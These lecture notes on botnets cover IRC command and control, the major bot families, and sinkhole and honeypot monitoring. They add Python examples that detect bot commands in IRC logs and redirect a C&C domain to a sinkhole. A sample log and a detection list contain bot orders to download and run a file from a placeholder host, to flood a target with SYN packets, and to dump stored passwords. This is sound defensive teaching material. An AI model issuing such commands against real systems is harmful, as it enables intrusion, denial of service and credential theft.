CAP6135: Malware and Software Vulnerability Analysis Botnets Cliff Zou Spring 2012.

Acknowledgement
This lecture uses some content from the lecture notes of:
- Dr. Dawn Song: CS161: Computer Security
- Richard Wang, SophosLabs: The Development of Botnets
- Randy Marchany, VA Tech IT Security Lab: Botnets

- Collection of compromised hosts
  - Spread like worms and viruses
  - Once installed, respond to remote commands
- A network of 'bots'
  - robot: an automatic machine that can be programmed to perform specific tasks
- Also known as 'zombies'

- Platform for many attacks
  - Spam forwarding (70% of all spam?)
  - Click fraud
  - Keystroke logging
  - Distributed denial of service attacks
- Serious problem
  - Top concern of banks, online merchants
  - Vint Cerf: ¼ of hosts connected to the Internet

What are botnets used for?
[figure slide]

IRC (Internet Relay Chat) based Control
[figure slides: IRC-based command-and-control topology]

Why IRC?
- IRC servers are:
  - freely available
  - easy to manage
  - easy to subvert
- Attackers have experience with IRC
- IRC bots usually have a way to remotely upgrade victims with new payloads to stay ahead of security efforts

How bad is the problem?
- Symantec identified a 400K-node botnet
- A network administrator in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections
  - Phatbot harvests MyDoom- and Bagle-infected machines
- Researchers at Georgia Tech (Gatech) monitored thousands of botnets

Spreading Problem
- The spreading mechanism is a leading cause of background noise
- Ports 445, 135, 139 and 137 accounted for 80% of the traffic captured by the German Honeynet Project
- Other ports:
  - 2745: Bagle backdoor
  - 3127: MyDoom backdoor
  - 3410: Optix trojan backdoor
  - 5000: UPnP vulnerability

Most commonly used bot families
- Agobot
- SDBot
- SpyBot
- GT Bot

Agobot
- Most sophisticated: 20,000 lines of C/C++ code
- IRC-based command/control
- Large collection of target exploits
- Capable of many DoS attack types
- Shell encoding / polymorphic obfuscation
- Traffic sniffers / key logging
- Defends/fortifies the compromised system
- Ability to frustrate disassembly

SDBot
- Simpler than Agobot: 2,000 lines of C code
- Non-malicious at base
- Utilizes IRC-based command/control
- Easily extended for malicious purposes:
  - Scanning
  - DoS attacks
  - Sniffers
  - Information harvesting
  - Encryption

SpyBot
- < 3,000 lines of C code
- Possibly evolved from SDBot
- Similar command/control engine
- No attempt to hide malicious purposes

GT Bot
- Functions based on mIRC scripting capabilities
- HideWindow program hides the bot on the local system
- Basic rootkit function
- Port scanning, DoS attacks, exploits for RPC and NetBIOS

- Variance in codebase size, structure, complexity, implementation
- Convergence in the set of functions
  - Possibility for defense systems effective across bot families
- Bot families are extensible
- Agobot likely to become dominant

Control
- All of the above use IRC for command/control
  - Disrupt IRC, disable bots
  - Sniff IRC traffic for commands
  - Shut down channels used for botnets
  - IRC operators play a central role in stopping botnet traffic
- But a botnet could use its own IRC server
  - Automated traffic identification required
- Future botnets may move away from IRC
  - Move to P2P communication
  - Traffic fingerprinting still useful for identification

Host control
- Fortify the system against other malicious attacks
- Disable anti-virus software
- Harvest sensitive information
  - PayPal, software keys, etc.
- Economic incentives for botnets
- Stresses the need to patch/protect systems prior to attack
- Stronger protection boundaries required across applications in OSes

Example Botnet Commands
- Connection
  - CLIENT: PASS
  - HOST: (if error, disconnect)
  - CLIENT: NICK
  - HOST: NICKERROR | CONNECTED
- Pass hierarchy info
- BOTINFO
- BOTQUIT

Example Botnet Commands
- IRC commands
  - CHANJOIN
  - CHANPART
  - CHANOP
  - CHANKICK
  - CHANBANNED
  - CHANPRIORITY

Example Botnet Commands
- pstore: display all usernames/passwords stored in the browsers of infected systems
- bot.execute: run an executable on the remote system
- bot.open: read a file on the remote computer
- bot.command: run a command with system()

Example Botnet Commands
- http.execute: download and execute a file over HTTP
- ftp.execute
- ddos.udpflood
- ddos.synflood
- ddos.phaticmp
- redirect.http
- redirect.socks
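The Control slide proposes sniffing IRC traffic for commands, and the four Example Botnet Commands slides give the vocabulary such a sniffer would look for. The following is an added example, not code from the lecture: it parses raw IRC lines from a capture, flags PRIVMSG/TOPIC messages whose first word is one of the Agobot-style command names listed on the slides, and separately notes the non-standard NICKERROR/CONNECTED server replies from the handshake slide (a standard IRC server answers with numeric replies instead). The log lines are constructed for the example and use documentation addresses; only the leading token of a message is matched, which is an assumption about how these bots receive commands and keeps ordinary chat that merely mentions a command name from firing.

```python
"""Flag IRC traffic that carries botnet command-and-control messages.

Added example for the 'Control' and 'Example Botnet Commands' slides; it is not
code from the lecture. The command vocabulary is the Agobot-style set the slides
list; the IRC log lines are constructed and use RFC 5737 documentation addresses.
"""
import re
from collections import defaultdict

# Leading tokens of bot commands named on the slides (assumed to arrive as the
# first word of a PRIVMSG or TOPIC, optionally prefixed with '.' or '!').
BOT_COMMAND_PREFIXES = ("bot.", "http.", "ftp.", "ddos.", "redirect.", "pstore")

# Non-standard server replies from the slides' connection handshake; a real
# IRC server answers a login with numeric replies such as 001, never these.
NONSTANDARD_REPLIES = {"NICKERROR", "CONNECTED"}

# RFC 1459 message shape: [':' prefix SPACE] command [params] [' :' trailing]
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+)\s+)?(?P<cmd>[A-Za-z]+|\d{3})(?P<rest>.*)$")


def parse_irc(line):
    """Split one raw IRC line into nick, command, parameter list and trailing text."""
    m = IRC_LINE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest")
    if " :" in rest:
        params, trail = rest.split(" :", 1)
    else:
        params, trail = rest, ""
    prefix = m.group("prefix")
    return {
        "nick": prefix.split("!", 1)[0] if prefix else None,
        "cmd": m.group("cmd").upper(),
        "params": params.split(),
        "trail": trail,
    }


def command_token(text):
    """First word of a message with any '.'/'!' sigil stripped, lower-cased."""
    words = text.split()
    return words[0].lstrip(".!").lower() if words else ""


def is_bot_command(text):
    """True when the message starts with one of the known bot command names."""
    return command_token(text).startswith(BOT_COMMAND_PREFIXES)


def scan_irc_log(lines):
    """Return ({channel: [(nick, command), ...]}, [non-standard replies seen])."""
    hits = defaultdict(list)
    odd_replies = []
    for line in lines:
        msg = parse_irc(line)
        if msg is None:
            continue
        if msg["cmd"] in NONSTANDARD_REPLIES:
            odd_replies.append(msg["cmd"])
        if msg["cmd"] in ("PRIVMSG", "TOPIC") and msg["params"] and is_bot_command(msg["trail"]):
            hits[msg["params"][0]].append((msg["nick"], command_token(msg["trail"])))
    return dict(hits), odd_replies


def suspicious_channels(lines, min_hits=2):
    """Channels in which at least `min_hits` bot-style commands were issued."""
    hits, _ = scan_irc_log(lines)
    return sorted(chan for chan, cmds in hits.items() if len(cmds) >= min_hits)


# Constructed capture: a bot's login handshake, a control channel, and normal chat.
SAMPLE_LOG = [
    "PASS s3cret",
    "NICK bot-7f3a",
    ":c0ntrol.example CONNECTED",
    ":botmaster!op@203.0.113.5 PRIVMSG #c0ntrol :.pstore",
    ":botmaster!op@203.0.113.5 PRIVMSG #c0ntrol :.http.execute http://203.0.113.9/update.bin",
    ":botmaster!op@203.0.113.5 TOPIC #c0ntrol :.ddos.synflood 192.0.2.10 80",
    ":alice!u@198.51.100.7 PRIVMSG #linux :is bot.execute a real command name?",
    ":bob!u@198.51.100.8 PRIVMSG #linux :no idea, ask in #security",
]

if __name__ == "__main__":
    channels, replies = scan_irc_log(SAMPLE_LOG)
    print("non-standard replies:", replies)               # ['CONNECTED']
    for chan, cmds in channels.items():
        print(chan, cmds)
    print("suspicious:", suspicious_channels(SAMPLE_LOG))  # ['#c0ntrol']
```

Matching on the TOPIC command as well as PRIVMSG matters because a channel topic is delivered to every bot that joins, which is a common way for a controller to issue a standing order; the `min_hits` threshold in `suspicious_channels` is a tunable that trades a single chance hit against missing a quiet channel.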

Current Botnet Control Architecture
[figure: bots connecting to C&C servers, with the botmaster behind the C&C servers]
- More than one C&C server
- Spread all around the world

Botnet Monitor: Gatech KarstNet
[figure: bots, the attacker's C&C at cc1.com, and the KarstNet sinkhole]
- A lot of bots use a Dyn-DNS name to find the C&C
- KarstNet informs the DNS provider of cc1.com
  - Detects cc1.com by its abnormal DNS queries
- The DNS provider maps cc1.com to the Gatech sinkhole (DNS hijack)
- All/most bots attempt to connect to the sinkhole
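The KarstNet slide describes two steps: spotting the C&C name from its abnormal DNS query pattern, then having the DNS provider answer that name with the sinkhole address so the bots connect to the monitor instead. The example below is added here and is neither the lecture's code nor KarstNet's; it works from a constructed resolver log and constructed zone data. The scoring rule it uses (many distinct clients asking for a name that is served with a short TTL, as a dynamic-DNS name would be) is an assumed simplification of "abnormal DNS queries", the thresholds are assumptions, and cc1.com is the slide's own placeholder name for the C&C.

```python
"""Detect a C&C name from its DNS query pattern and sinkhole it at the provider.

Added example for the KarstNet slide; not code from the lecture or from KarstNet.
The query log, zone data, sinkhole address and thresholds are all constructed or
assumed for the example; cc1.com is the slide's placeholder C&C name.
"""

# Constructed resolver log: (client_ip, queried_name, answer_ttl_seconds)
SAMPLE_QUERIES = [
    ("198.51.100.11", "cc1.com", 60),
    ("198.51.100.12", "cc1.com", 60),
    ("198.51.100.13", "cc1.com", 60),
    ("198.51.100.14", "cc1.com", 60),
    ("198.51.100.11", "cc1.com", 60),            # a bot re-resolving after TTL expiry
    ("198.51.100.20", "mail.example.com", 3600),
    ("198.51.100.21", "mail.example.com", 3600),
    ("198.51.100.22", "www.example.com", 3600),  # popular but long-TTL: benign
    ("198.51.100.23", "www.example.com", 3600),
    ("198.51.100.24", "www.example.com", 3600),
    ("198.51.100.25", "www.example.com", 3600),
]

# Constructed authoritative data the provider serves before any hijack.
REAL_ZONE = {
    "cc1.com": "203.0.113.50",        # the real C&C address
    "mail.example.com": "192.0.2.25",
    "www.example.com": "192.0.2.80",
}

SINKHOLE_IP = "192.0.2.200"           # placeholder for the Gatech sinkhole


def profile_names(queries):
    """Per name: query count, number of distinct querying clients, smallest TTL seen."""
    raw = {}
    for client, qname, ttl in queries:
        p = raw.setdefault(qname, {"queries": 0, "clients": set(), "min_ttl": ttl})
        p["queries"] += 1
        p["clients"].add(client)
        p["min_ttl"] = min(p["min_ttl"], ttl)
    return {q: {"queries": p["queries"], "clients": len(p["clients"]), "min_ttl": p["min_ttl"]}
            for q, p in raw.items()}


def flag_candidates(queries, min_clients=4, short_ttl=300):
    """Names queried by at least `min_clients` distinct hosts and answered with a short TTL.

    Both conditions are required: a busy long-TTL name (www.example.com in the
    sample) is ordinary traffic, and a short-TTL name asked for by one host is
    just one dynamic-DNS user."""
    return sorted(q for q, p in profile_names(queries).items()
                  if p["clients"] >= min_clients and p["min_ttl"] <= short_ttl)


def build_sinkhole_zone(flagged, sinkhole_ip):
    """Overrides the DNS provider installs: each flagged name now answers with the sinkhole."""
    return {name: sinkhole_ip for name in flagged}


def resolve(name, real_zone, sinkhole_zone):
    """Provider-side answer: a sinkholed name wins over the real record (the 'DNS hijack')."""
    return sinkhole_zone.get(name, real_zone.get(name))


if __name__ == "__main__":
    flagged = flag_candidates(SAMPLE_QUERIES)
    sink = build_sinkhole_zone(flagged, SINKHOLE_IP)
    print("flagged:", flagged)                                            # ['cc1.com']
    print("cc1.com ->", resolve("cc1.com", REAL_ZONE, sink))              # 192.0.2.200
    print("www.example.com ->", resolve("www.example.com", REAL_ZONE, sink))  # 192.0.2.80
```

Once the override is in place, every bot that re-resolves cc1.com after its short TTL expires is handed the sinkhole address, which is why the slide expects all or most of the botnet to show up there; a bot that cached the real address before the hijack keeps using it until that cache entry ages out.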

Botnet Monitor: Honeypot Spy
- Security researchers set up honeypots
  - Honeypots: deliberately vulnerable machines
  - When compromised, closely monitor the malware's behavior
  - Tutorial:
- When a compromised honeypot joins a botnet
  - Passive monitoring: log all network traffic
  - Active monitoring: actively contact other bots to obtain more information (neighborhood list, additional C&C, etc.)
- Representative research paper: "A multifaceted approach to understanding the botnet phenomenon", Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose and Andreas Terzis, 6th ACM SIGCOMM Conference on Internet Measurement (IMC), 2006

The Future Generation of Botnets
- Peer-to-peer C&C
- Polymorphism
- Anti-honeypot
- Rootkit techniques